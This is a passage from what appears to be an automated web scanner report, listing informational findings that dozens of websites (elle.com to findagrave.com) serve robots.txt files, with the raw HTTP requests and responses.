Set-Cookie: v=NEW; expires=Mon, 02 May 2011 14:00:20 GMT; path=/; domain=www.ehow.co.uk;
ETag: "6ed485fcdbc3fdf6d0a3a393e95f5a88:1300482785"
Cache-Control: max-age=86348
Date: Sat, 02 Apr 2011 14:00:20 GMT
Connection: close

User-agent: *
Disallow: /IDidThisSolutionEdit
Disallow: /CultureSwitch
Disallow: /PrintArticle
Disallow: /print/
Disallow: /Searchfeed
Disallow: /MailingList
Disallow: /forums.aspx
Sitemap: http://www
...[SNIP]...

24.276. http://www.elle.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elle.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.elle.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Unix) DAV/2 PHP/5.2.12 SVN/1.5.5
Last-Modified: Tue, 15 Mar 2011 04:37:08 GMT
ETag: "280df-e1-49e7dfb1e2500"
Accept-Ranges: bytes
Content-Length: 225
Content-Type: text/plain; charset=utf-8
Date: Sat, 02 Apr 2011 14:06:45 GMT
Connection: close

User-agent: *
Disallow:/Designers/
Disallow:/Shopping/Elle-Shops/Product/(id)/

Sitemap: http://www.elle.com/sitemap/sitemap_index.xml

User-agent: Googlebot
Noindex: /Shopping/Elle-Shops/Product/(
...[SNIP]...

24.277. http://www.elyrics.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elyrics.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.elyrics.net

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.14
Last-Modified: Tue, 21 Sep 2010 17:00:11 GMT
ETag: "1848a74-2f4-490c7f63e1cc0"
Accept-Ranges: bytes
Content-Length: 756
Connection: close
Content-Type: text/plain

#########################################
#########################################
### The following command will disable just the directory "private" and all its contents:
### Disallow: /private/
##
...[SNIP]...

24.278. http://www.emedtv.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.emedtv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.emedtv.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:55 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: UT1=173.193.214.243.1301751595715130; path=/; expires=Tue, 30-Mar-21 13:39:55 GMT; domain=.emedtv.com
Last-Modified: Thu, 31 Mar 2011 23:53:27 GMT
Cache-Control: max-age=300
Content-Length: 952
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /pub_js/
Disallow: /lps/
Disallow: /lpssrc/
Disallow: /m/
Disallow: /skyframeopenads.html
Disallow: /skyframe.html
Disallow: /boxframeopenads.html
Disallow: /boxframebottomopen
...[SNIP]...

24.279. http://www.encyclopedia.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.encyclopedia.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.encyclopedia.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=432000
Content-Type: text/plain
Last-Modified: Tue, 15 Mar 2011 15:48:36 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/7.0
Date: Sat, 02 Apr 2011 13:39:39 GMT
Connection: close
Content-Length: 1169

# Encyclopedia: robots.txt
#
# this file is used to allow crawlers to crawl our site.
#
user-agent: *
Disallow: /printtopic.aspx
Disallow: /printdocument.aspx
Disallow: /documentlogging.asp
...[SNIP]...

24.280. http://www.engadget.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.engadget.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.engadget.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:33 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 122
Keep-Alive: timeout=5, max=999992
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /forward
Disallow: /traffic
Disallow: /mm_track
Disallow: /search
Disallow: /_uac/adpage.html

24.281. http://www.enotes.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.enotes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.enotes.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:08 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 31 Mar 2011 17:11:21 GMT
ETag: "73311-11e-49fca61de2040"
Accept-Ranges: bytes
Content-Length: 286
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Connection: close

User-agent: *
Disallow: /images/
Disallow: /404.php
Disallow: /favicon.ICO
Disallow: /*buyPass
Disallow: /*citePage
Disallow: /*getpass
Disallow: /*print
Disallow: /*login
Disallow: /*titleCite
Disall
...[SNIP]...

24.282. http://www.enterprise.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.enterprise.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.enterprise.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:36 GMT
Server: Apache
Last-Modified: Thu, 25 Mar 2010 15:23:00 GMT
ETag: "22cbe-384-482a19f409d00"
Accept-Ranges: bytes
Content-Length: 900
Connection: close
Content-Type: text/plain; charset=ISO-8859-1
X-Pad: avoid browser bug

User-agent: *
Disallow: /arms_auto/
Disallow: /armsweb/
Disallow: /casestudy/
Disallow: /ukcorp/
Disallow: /aaa/
Disallow: /afs/
Disallow: /AAA/
Disallow: /AFS/
Disallow: /content/include/
Disallow: /
...[SNIP]...

24.283. http://www.eonline.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eonline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.eonline.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.2 (Unix) mod_jk/1.2.20 PHP/5.2.4
Accept-Ranges: bytes
Content-Type: text/plain; charset=utf-8
Content-Length: 732
X-N: S
Date: Sat, 02 Apr 2011 13:43:47 GMT
Connection: close
Set-Cookie: edition=us; expires=Sun, 03-Apr-2011 13:43:47 GMT; path=/; domain=.eonline.com
Set-Cookie: adEdition=us; expires=Sun, 03-Apr-2011 13:43:47 GMT; path=/; domain=.eonline.com

# robots.txt for all EOL sites
#
# Note to people who might be reading this: You won't find anything
# interesting or confidential beneath the following paths. These are
# simply areas that don't make
...[SNIP]...

24.284. http://www.epa.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.epa.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.epa.gov

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:12:53 GMT
Server: Apache
Last-Modified: Sat, 02 Apr 2011 10:52:22 GMT
ETag: "d3c4030d-2d312-49fed52334580"
Accept-Ranges: bytes
Content-Length: 185106
Connection: close
Content-Type: text/plain

# robots.txt file for http://www.epa.gov
User-agent: *
Disallow: /search97/
Disallow: /reports/
Disallow: /scram001/7thconf/calpuff/apr02a.met
Disallow: /scram001/7thconf/calpuff/apr02b.met
Disallow:
...[SNIP]...

24.285. http://www.epicurious.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.epicurious.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.epicurious.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "9e6961b58cdc866a011f4cda7f672580:1254767395"
Last-Modified: Mon, 05 Oct 2009 18:29:55 GMT
Accept-Ranges: bytes
Content-Length: 298
Content-Type: text/plain
Date: Sat, 02 Apr 2011 14:00:01 GMT
Connection: close
X-N: S

User-agent: *
Sitemap: http://www.epicurious.com/sitemap.xml
Disallow: /tools/searchresults*?*pageNumber=*
Disallow: /tools/searchresults*?*threshold=*
Disallow: /tools/browseresults*?*threshold=*
Dis
...[SNIP]...

24.286. http://www.epinions.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.epinions.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.epinions.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:52 GMT
Server: Apache/2.2.14 (Unix) PHP/4.4.9
Set-Cookie: EPV_PgVwID=59173f1f09973f7e7d07d8b8; path=/; domain=.epinions.com;
Cache-control: private
Content-Length: 34
Connection: close
Content-Type: text/html

User-agent: *
Disallow: /content/

24.287. http://www.epodunk.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.epodunk.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.epodunk.com

Response

HTTP/1.1 200 OK
Server: IBSrv 1.0
Date: Sat, 02 Apr 2011 14:18:50 GMT
Content-Type: text/plain
Connection: close
Content-Length: 935
Last-Modified: Tue, 16 Dec 2008 20:18:14 GMT
Accept-Ranges: bytes
ETag: "087766cbb5fc91:eb1"
X-Powered-By: ASP.NET

# robots.txt, www.epodunk.com 12/28/2005
#
User-Agent: Ocelli
Disallow: /
User-agent: URL_Spider_Pro
Disallow: /
User-agent: CherryPicker
Disallow: /
User-agent: EmailCollector
Disallow: /

...[SNIP]...

24.288. http://www.eppicard.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eppicard.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.eppicard.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:08:55 GMT
Server: Apache/2.2.3 (Red Hat) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Fri, 05 Sep 2008 19:54:36 GMT
ETag: "36684-78-4562b70639700"
Accept-Ranges: bytes
Content-Length: 120
Cache-Control: max-age=1800
Expires: Sat, 02 Apr 2011 14:38:55 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

# Allow Googlebot anywhere
User-agent: Googlebot
Disallow:
# Allow no other bots on the site
User-agent: *
Disallow: /

24.289. http://www.essortment.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.essortment.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.essortment.com

Response

HTTP/1.0 200 OK
Content-Type: text/html; charset=UTF-8
ETag: "6df0d8e51dc38df49074b72c0ef58d84c8904776"
Server: TornadoServer/0.1
Date: Sat, 02 Apr 2011 13:35:10 GMT
Content-Length: 72
Connection: close

User-agent: *
Disallow:
Sitemap: http://www.essortment.com/sitemap.xml

24.290. http://www.etsy.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.etsy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.etsy.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 28 Mar 2011 19:06:14 GMT
Accept-Ranges: bytes
Content-Length: 1120
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Date: Sat, 02 Apr 2011 13:31:05 GMT
Connection: close

User-agent: Spinn3r
Disallow: /
User-agent: *
Disallow: /assets/
Disallow: /css/
Disallow: /flash/
Disallow: /functions/
Disallow: /js/
Disallow: /maintenance/
Disallow: /planb/
Disallow: /static/
Dis
...[SNIP]...

24.291. http://www.everydayhealth.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.everydayhealth.com

Response

HTTP/1.1 200 OK
Content-Length: 7814
Content-Type: text/plain
Last-Modified: Wed, 23 Mar 2011 19:07:46 GMT
Accept-Ranges: bytes
ETag: "02d0988de9cb1:3da6"
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB07
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:26:17 GMT
Connection: close

User-agent: AdsBot-Google
Allow: /
Disallow:

User-agent: Mediapartners-Google
Allow: /
Disallow:

User-agent: adidxbot
Allow: /
Disallow:

User-agent: MSNPTC
Allow: /
Disallow:

User-
...[SNIP]...

24.292. http://www.evtv1.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.evtv1.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.evtv1.com

Response

HTTP/1.1 200 OK
Content-Length: 2187
Content-Type: text/plain
Last-Modified: Wed, 10 Sep 2008 04:00:43 GMT
Accept-Ranges: bytes
ETag: "c870e4cbf912c91:1433"
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR PSAi PSDi OUR BUS UNI COM NAV INT STA OTC'
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:53:45 GMT
Connection: close

User-agent: *
Disallow: /Admin/
Disallow: /Connections/
Disallow: /ABC/
Disallow: /Advertiser/
Disallow: /advertisers/
Disallow: /Andy/
Disallow: /AndyVidsense/
Disallow: /anisha/
Disallow: /
...[SNIP]...

24.293. http://www.ew.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ew.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ew.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:12 GMT
Server: Apache
Last-Modified: Thu, 10 Jul 2008 14:00:07 GMT
ETag: "1a8-d7b407c0"
Accept-Ranges: bytes
Content-Length: 424
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

# Welcome to Pathfinder's robots.txt
#
# If you have any questions about indexing our site,
# especially regarding more efficient or convenient
# methods, please write to:
#
#
...[SNIP]...

24.294. http://www.examiner.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.examiner.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.examiner.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 12:43:56 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Last-Modified: Fri, 01 Apr 2011 19:34:21 GMT
ETag: "17006e2-666-49fe07f1de940"
Accept-Ranges: bytes
Content-Length: 1638
Cache-Control: max-age=1209600
Expires: Sat, 16 Apr 2011 12:43:56 GMT
X-WebNode: web4.b.examiner.com

# $Id: robots.txt,v 1.15 2010/12/29 04:05:07 webchick Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by site
...[SNIP]...

24.295. http://www.expedia.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.expedia.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html
ntCoent-Length: 554
Cache-Control: private, max-age=313394
Date: Sat, 02 Apr 2011 13:23:12 GMT
Content-Length: 554
Connection: close

User-agent: *
Allow: /
Disallow: /daily/common/
Disallow: /cd/
Disallow: /pub/agent.dll?qscr=mrdt
Disallow: /pub/agent.dll?qscr=mrdr
Disallow: /daily/vacations/merch/
Disallow: /daily/ho
...[SNIP]...

24.296. http://www.experienceproject.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.experienceproject.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.experienceproject.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 14:00:00 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Thu, 02 Sep 2010 20:34:37 GMT
Accept-Ranges: bytes
Content-Length: 1277
Vary: Accept-Encoding

User-agent: *
Disallow: /ajax/
Disallow: /register.php?
Disallow: /dologin.php?
Disallow: /search_rss.php?
Disallow: /invitation.php?
Disallow: /widgets_js/
Disallow: /FCKeditor/
Disallow: /me
...[SNIP]...

24.297. http://www.ez-tracks.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ez-tracks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ez-tracks.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 02 Apr 2011 14:14:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/plain

User-agent: *
Disallow: /songcategories.html
Disallow: /nlogClicks.cfm
Disallow: /noads.html
Disallow: /index-VideoCategory-Adult.html
Disallow: /index-Video-Anna_Nicole_Smith_Exposed.html
Disal
...[SNIP]...

24.298. http://www.ezanga.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ezanga.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ezanga.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:44 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sun, 03 Jan 2010 01:09:56 GMT
ETag: "1401cb-32a-47c38434d6100"
Accept-Ranges: bytes
Content-Length: 810
Connection: close
Content-Type: text/plain; charset=UTF-8

# By reading this file, you are blocked from accessing any regular files.
# Any attempts to violate this will be recorded. If simple curiosity led
# you to read this file, I'm sorry -- by reading this
...[SNIP]...

24.299. http://www.factmonster.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.factmonster.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.factmonster.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:16:25 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.1301753785137375; path=/; expires=Sun, 01-Apr-12 14:16:25 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 14:16:25 GMT
Content-Length: 533
Content-Type: text/plain;charset=iso-8859-1

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /dynaweb/
Disallow: /dw/
Disallow: /oasis/
Disallow: /oasisi-e.php
Disallow: /oasisi-i.php
Disallow: /oasisi-j.php
Disallow: /oasis
...[SNIP]...

24.300. http://www.familyeducation.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.familyeducation.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.familyeducation.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 02 Apr 2011 13:56:22 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Wed, 23 Jan 2008 19:33:56 GMT
ETag: "70bfb8e4f65dc81:941"
Content-Length: 1822

# robots.txt for http://www.familyeducation.com/

Sitemap: http://www.familyeducation.com/sitemap.xml

User-agent: *
Disallow: /article/email
Disallow: /article/print
Disallow: /software/
Disa
...[SNIP]...

24.301. http://www.famousfootwear.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.famousfootwear.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.famousfootwear.com

Response

HTTP/1.0 200 OK
Content-Length: 1154
Content-Type: text/plain
Last-Modified: Wed, 16 Jun 2010 20:34:40 GMT
Accept-Ranges: bytes
ETag: "7cd745893dcb1:99d1"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:16:34 GMT
Connection: close

User-agent: *
Disallow: /24hourfitness/
Disallow: /310monitoring/
Disallow: /aaa/
Disallow: /aaahawaii/
Disallow: /aaaloginrequest/
Disallow: /aaanewmexico/
Disallow: /aaapremier/
Disallow: /a
...[SNIP]...

24.302. http://www.fandango.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fandango.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fandango.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Content-Length: 394
Content-Type: text/plain
Last-Modified: Fri, 19 Nov 2010 23:57:45 GMT
Accept-Ranges: bytes
ETag: "b5157a8f4588cb1:39ab"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa OUR DELa STP BUS UNI COM NAV INT CNT STA"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:26:51 GMT
Connection: close

User-agent: *
Disallow: /bin/
Disallow: /TicketBoxOffice.aspx
Disallow: /ticketboxoffice.aspx
Disallow: /purchase/movietickets/ticketboxoffice.aspx

Sitemap: http://www.fandango.com/sitemapindex
...[SNIP]...

24.303. http://www.fanfiction.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fanfiction.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fanfiction.net

Response

HTTP/1.0 200 OK
Server: LiteSpeed
Date: Sat, 02 Apr 2011 13:42:29 GMT
Connection: close
Vary: Accept-Encoding
ETag: "8b-4bfb4c95-0"
Last-Modified: Tue, 25 May 2010 04:05:41 GMT
Content-Type: text/plain
Age: 12
X-Monk: 2

User-agent: *
Disallow: /secure/
Disallow: /rs/
Disallow: /ru/
Disallow: /eye/
Disallow: /m/
Allow: /

User-agent: ia_archiver
Disallow: /

24.304. http://www.fanpop.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fanpop.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fanpop.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Sat, 02 Apr 2011 13:32:52 GMT
Content-Type: text/plain
Content-Length: 105
Last-Modified: Mon, 08 Nov 2010 23:29:45 GMT
Connection: close
Expires: Sat, 02 Apr 2011 13:32:53 GMT
Cache-Control: max-age=1
Accept-Ranges: bytes

User-agent: *
Disallow: /search/
Disallow: /superquiz/
Disallow: /a/
Disallow: /site/go
Disallow: /user/

24.305. http://www.faqs.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.faqs.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.faqs.org

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:36 GMT
Server: Apache
Last-Modified: Thu, 17 Mar 2011 09:50:32 GMT
ETag: "61f85c2-cb-49eaa979b2a00"
Accept-Ranges: bytes
Content-Length: 203
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: terms.html
Disallow: /abstracts/mtc.class.php
Disallow: /knowledge

User-agent: sitebot
Disallow: /

User-agent: businessdbbot
Disallow: /

User-agent: magpie-crawle
Disallow:
...[SNIP]...

24.306. http://www.fark.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fark.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fark.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:56:19 GMT
Content-Type: text/plain
Content-Length: 246
Last-Modified: Thu, 06 Jan 2011 07:30:11 GMT
Connection: close
Expires: Sat, 09 Apr 2011 13:56:19 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

User-agent: *
Crawl-delay: 1
Disallow: /nospam/
Disallow: /nomirror/
Allow: /cgi/comments.pl
Allow: /cgi/fark/comments.pl
Allow: /comments
Disallow: /cgi/
Disallow: /users
Disallow: /submit
# $Id: rob
...[SNIP]...

24.307. http://www.farlex.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.farlex.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.farlex.com

Response

HTTP/1.1 200 OK
Content-Length: 33
Content-Type: text/plain
Last-Modified: Tue, 29 Sep 2009 18:26:57 GMT
Accept-Ranges: bytes
ETag: "66329c6d3241ca1:1985"
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:34:45 GMT
Connection: close

User-agent: NPBot
Disallow: /

24.308. http://www.fastcompany.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fastcompany.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fastcompany.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:54:55 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: MISS
Expires: Sat, 02 Apr 2011 14:14:55 GMT
Last-Modified: Sat, 02 Apr 2011 13:54:55 GMT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
ETag: "1301752495"
Vary: Accept-Encoding
X-Served-By: daa-www014
Content-Length: 2082
Content-Type: text/plain; charset=UTF-8
X-Cache: MISS from VoxCAST
Connection: close

# $Id: robots.txt,v 1.2.2.3 2007/08/05 09:56:41 hass Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by
...[SNIP]...

24.309. http://www.fatwallet.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fatwallet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fatwallet.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:41:01 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 29 Dec 2010 20:29:45 GMT
ETag: "ae57f4-2ee-498926e004040"
Accept-Ranges: bytes
Content-Length: 750
Cache-Control: max-age=43200
Expires: Sun, 03 Apr 2011 01:41:01 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

sitemap: http://www.fatwallet.com/sitemap.xml

User-agent: *
Allow: /
Disallow: /automate/
Disallow: /bonusbucks/
Disallow: /cashback/admin/
Disallow: /cashback/admin2/
Disallow: /compare-prices/
Disa
...[SNIP]...

24.310. http://www.fda.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fda.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fda.gov

Response

HTTP/1.0 200 OK
Content-Length: 404
Content-Type: text/plain
Last-Modified: Sat, 30 May 2009 13:05:54 GMT
Accept-Ranges: bytes
ETag: "118ca05d27e1c91:fab"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=1343
Date: Sat, 02 Apr 2011 13:45:05 GMT
Connection: close

#Added for Bristol-Myers on Sept 2005
User-agent: vspider
Disallow: /

#For all other crawlers
User-agent: *
Disallow: /Management/ # don't crawl healthcheck
Hit-rate: 30 # wait 30 second
...[SNIP]...

24.311. http://www.fedex.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fedex.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fedex.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 13:24:33 GMT
Content-length: 24
Content-type: text/plain
X-ua-compatible: IE=EmulateIE7
Set-cookie: fdx_cbid=22185494081301750673092940271330; expires=Monday, 18-January-2038 21:14:07 GMT; path=/; domain=.fedex.com
Last-modified: Thu, 14 Jan 2010 17:35:09 GMT
Connection: close

User-agent: *
Allow: /


24.312. http://www.filehippo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filehippo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.filehippo.com

Response

HTTP/1.1 200 OK
Content-Length: 24
Content-Type: text/plain
Last-Modified: Fri, 14 Jan 2011 12:45:39 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:37:30 GMT
Connection: close

User-agent: *
Disallow:

24.313. http://www.findagrave.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.findagrave.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.findagrave.com

Response

